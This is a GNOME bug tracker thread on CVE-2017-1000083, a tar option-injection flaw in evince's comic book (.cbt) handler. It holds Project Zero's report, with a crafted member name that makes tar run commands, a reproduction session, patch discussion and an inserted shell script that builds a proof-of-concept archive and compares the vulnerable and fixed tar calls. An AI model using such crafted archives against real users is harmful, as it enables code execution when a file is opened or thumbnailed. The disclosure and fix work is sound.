Bug 784630 - (CVE-2017-1000083) Evince command injection vulnerability in CBT handler
Status: RESOLVED FIXED
Product: evince
Classification: Core
Component: backends
Version: 3.24.x
Platform: Other Linux
Importance: Normal critical
Assigned To: Evince Maintainers
Reported: 2017-07-06 18:06 UTC by Michael Catanzaro
Modified: 2017-07-17 14:51 UTC
GNOME target: ---
GNOME version: ---

Attachments
comics: Remove support for tar and tar-like commands (4.54 KB, patch), 2017-07-06 18:14 UTC, Bastien Nocera
comics: Remove support for tar and tar-like commands (4.87 KB, patch), 2017-07-06 18:18 UTC, Bastien Nocera
comics: Remove support for tar and tar-like commands (5.13 KB, patch), 2017-07-07 08:27 UTC, Bastien Nocera
Backport of the patch to 3.20.1 (5.02 KB, patch), 2017-07-13 10:26 UTC, Adrien Plazas
Backport of the patch to 3.20.1 (5.00 KB, patch), 2017-07-13 10:35 UTC, Adrien Plazas
Backport of the patch to 3.10.3 (3.50 KB, patch), 2017-07-13 10:51 UTC, Adrien Plazas

Description Michael Catanzaro 2017-07-06 18:06:27 UTC
From the folks at Project Zero:

"""
Hi,

The comic book backend in evince 3.24.0 is vulnerable to a command injection bug that can be used to execute arbitrary commands when a cbt file is opened:

cbt files are simple tar archives containing images. When a cbt file is processed, evince calls "tar -xOf $archive $filename" for every image file in the archive:

// backend/comics/comics-document.c: 914
        command_line = g_strdup_printf ("%s %s %s",
                                        comics_document->extract_command,
                                        quoted_archive,
                                        quoted_filename);

While both the archive name and the filename are quoted to not be interpreted by the shell, the filename is completely attacker controlled and can start with "--" which leads to tar interpreting it as a command line flag.

This can be exploited by creating a tar archive with an embedded file named something
like this: "--checkpoint-action=exec=bash -c 'touch ~/covfefe.evince;'.jpg"

(Make sure evince is not sandboxed by apparmor before trying to reproduce the attached POC)

fwilhelm@box $ tar -tf poc.cbt
--checkpoint-action=exec=bash -c 'touch ~/covfefe.evince;'.jpg
fwilhelm@box $ ls -la ~/covfefe.evince
ls: cannot access covfefe.evince: No such file or directory
fwilhelm@box $ evince poc.cbt
fwilhelm@box $ ls -la ~/covfefe.evince
-rw-r----- 1 fwilhelm eng 0 Jun 28 11:05 /home/fwilhelm/covfefe.evince

An easy way to fix this would be to change the ComicBookDecompressCommand entry for tar to
{"%s -xOf --"          , "%s -tf -- %s"      , NULL             , FALSE, NO_OFFSET}

Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to this issue.

Best,
Felix
"""

And also, importantly:

"""
I've also realized that my patch suggestion does not work as intended due to the weird command line
parsing of tar. Sorry about that.
"""
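The option injection described in the report, reproduced end to end and then closed, as an added example that is not part of the original report or of evince's own code. It assumes GNU tar (the --checkpoint-action option the report relies on is a GNU extension, and GNU tar's default checkpoint interval of every 10 records of 10 KiB is why the member body below is padded) and a POSIX sh. The marker file name injected.jpg, the 300 KiB zero-filled member body and the function names make_poc_cbt, vulnerable_extract and safe_extract are constructed for this example.

```shell
#!/bin/sh
# Added example, not evince code: reproduce the tar option injection from
# the report, then show the invocation that closes it. Assumes GNU tar and
# a POSIX sh; names and sizes below are constructed for the demonstration.
set -eu

# Constructed member name. Shell quoting keeps it out of the shell's hands,
# but tar still parses it as an option and runs `touch injected.jpg` in its
# working directory once a checkpoint fires.
MEMBER='--checkpoint-action=exec=touch injected.jpg'

# Build poc.cbt in $1. The member body is 300 KiB of zeros: GNU tar's default
# checkpoint fires every 10 records (10 KiB each), so a tiny archive would be
# fully read before any checkpoint action could run.
make_poc_cbt() {
  dir=$1
  dd if=/dev/zero bs=1024 count=300 of="$dir/$MEMBER" 2>/dev/null
  # "--" is needed on the create side too, or tar -cf parses the name as an option.
  tar -cf "$dir/poc.cbt" -C "$dir" -- "$MEMBER"
  rm -f "$dir/$MEMBER"
}

# Mirrors comics-document.c: "%s -xOf" + shell-quoted archive + shell-quoted
# page name, handed to a shell as one string. Both arguments are single-quoted,
# so the shell is not the problem; tar itself reads the member name as a flag.
# (Assumes the member name contains no single quotes, as in the report's PoC.)
vulnerable_extract() {
  dir=$1 archive=$2 member=$3
  cmd=$(printf "tar -xOf '%s' '%s'" "$archive" "$member")
  ( cd "$dir" && sh -c "$cmd" >/dev/null 2>&1 ) || true
}

# Fix: end option parsing with "--" before the member name. Note the report's
# own suggestion ("-xOf --") does not work because "--" then becomes the
# argument of -f; the terminator has to come after the archive name.
safe_extract() {
  dir=$1 archive=$2 member=$3
  ( cd "$dir" && tar -xOf "$archive" -- "$member" )
}

# Stand-alone demo: run both invocations against the constructed archive and
# report whether tar executed the embedded command.
demo() {
  work=$(mktemp -d)
  make_poc_cbt "$work"
  safe_extract "$work" poc.cbt "$MEMBER" >/dev/null
  [ -e "$work/injected.jpg" ] && echo "hardened: marker created (unexpected)" \
                               || echo "hardened: member extracted, no marker created"
  vulnerable_extract "$work" poc.cbt "$MEMBER"
  [ -e "$work/injected.jpg" ] && echo "vulnerable: marker created, tar ran the embedded command" \
                               || echo "vulnerable: no marker (not GNU tar, or checkpoint did not fire)"
  rm -rf "$work"
}
demo
```

The `--` terminator fixes this one parser; it does nothing for other extractors with their own option syntax, which is why the 3.26 rewrite that stops shelling out altogether is the stronger fix where it is available.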
Comment 1 Michael Catanzaro 2017-07-06 18:10:25 UTC
Note that this can presumably be triggered by the evince thumbnailer, which is not sandboxed. And web browsers that allow untrusted websites to auto-download files without user interaction (Chrome, Epiphany) can trigger the thumbnailer to run. So this is web exposed.
Comment 2 Bastien Nocera 2017-07-06 18:14:52 UTC
Created attachment 355036
comics: Remove support for tar and tar-like commands

When handling tar files, or using a command with tar-compatible syntax,
to open comic-book archives, both the archive name (the name of the
comics file) and the filename (the name of a page within the archive)
are quoted to not be interpreted by the shell.

But the filename is completely within the attacker's control and can start
with "--" which leads to tar interpreting it as a command line flag.

This can be exploited by creating a CBT file (a tar archive with the
.cbt suffix) with an embedded file named something like this:
"--checkpoint-action=exec=bash -c 'touch ~/hacked;'.jpg"

Discovered by Felix Wilhelm from the Google Security Team.
Comment 3 Bastien Nocera 2017-07-06 18:18:22 UTC
Created attachment 355038
comics: Remove support for tar and tar-like commands

When handling tar files, or using a command with tar-compatible syntax,
to open comic-book archives, both the archive name (the name of the
comics file) and the filename (the name of a page within the archive)
are quoted to not be interpreted by the shell.

But the filename is completely within the attacker's control and can start
with "--" which leads to tar interpreting it as a command line flag.

This can be exploited by creating a CBT file (a tar archive with the
.cbt suffix) with an embedded file named something like this:
"--checkpoint-action=exec=bash -c 'touch ~/hacked;'.jpg"

CBT files are infinitely rare (CBZ is usually used for DRM-free
commercial releases, CBR for those from more dubious provenance), so
removing support is the easiest way to avoid the bug triggering. All
this code was rewritten in the development release for GNOME 3.26 to not
shell out to any command, closing off this particular attack vector.

Discovered by Felix Wilhelm from the Google Security Team.
Comment 4 Michael Catanzaro 2017-07-06 19:30:59 UTC
Review of attachment 355038:

Looks good.

I'll use accepted-commit_after_freeze to refer to coordinated disclosure.
Comment 5 Bastien Nocera 2017-07-07 08:27:40 UTC
Created attachment 355062
comics: Remove support for tar and tar-like commands

When handling tar files, or using a command with tar-compatible syntax,
to open comic-book archives, both the archive name (the name of the
comics file) and the filename (the name of a page within the archive)
are quoted to not be interpreted by the shell.

But the filename is completely within the attacker's control and can start
with "--" which leads to tar interpreting it as a command line flag.

This can be exploited by creating a CBT file (a tar archive with the
.cbt suffix) with an embedded file named something like this:
"--checkpoint-action=exec=bash -c 'touch ~/hacked;'.jpg"

CBT files are infinitely rare (CBZ is usually used for DRM-free
commercial releases, CBR for those from more dubious provenance), so
removing support is the easiest way to avoid the bug triggering. All
this code was rewritten in the development release for GNOME 3.26 to not
shell out to any command, closing off this particular attack vector.

This also removes the ability to use libarchive's bsdtar-compatible
binary for CBZ (ZIP), CB7 (7zip), and CBR (RAR) formats. The first two
are already supported by unzip and 7zip respectively. libarchive's RAR
support is limited, so unrar is a requirement anyway.

Discovered by Felix Wilhelm from the Google Security Team.
Comment 6 Bastien Nocera 2017-07-07 13:45:21 UTC
On gnome-3-20 you'll also need to cherry-pick:
335c0536c137a8bcc886ca33c1aba6abaf32b99c
and
f932396d1c51646a1535eb28d7c8b1281e794a1a

Patch above applies cleanly after that.
Comment 7 Tobias Mueller 2017-07-10 16:52:08 UTC
FTR: This has been assigned CVE-2017-1000083.
Comment 8 Bastien Nocera 2017-07-11 15:09:37 UTC
Embargo date is Thursday 13th July 2017, 12:00 UTC.
Comment 9 Adrien Plazas 2017-07-13 10:26:37 UTC
Created attachment 355498
Backport of the patch to 3.20.1
Comment 10 Adrien Plazas 2017-07-13 10:35:55 UTC
Created attachment 355499
Backport of the patch to 3.20.1
Comment 11 Adrien Plazas 2017-07-13 10:51:38 UTC
Created attachment 355500
Backport of the patch to 3.10.3
Comment 12 Bastien Nocera 2017-07-13 12:33:17 UTC
The bug is fixed in the gnome-3-20, gnome-3-22 and gnome-3-24 branches, for distributions to cherry pick, or backport to older versions.
Comment 13 Bastien Nocera 2017-07-17 14:51:17 UTC
There was a typo in configure.ac leading to a warning when installing the software (through a package or from source). It's innocuous though:
https://bugzilla.gnome.org/show_bug.cgi?id=785026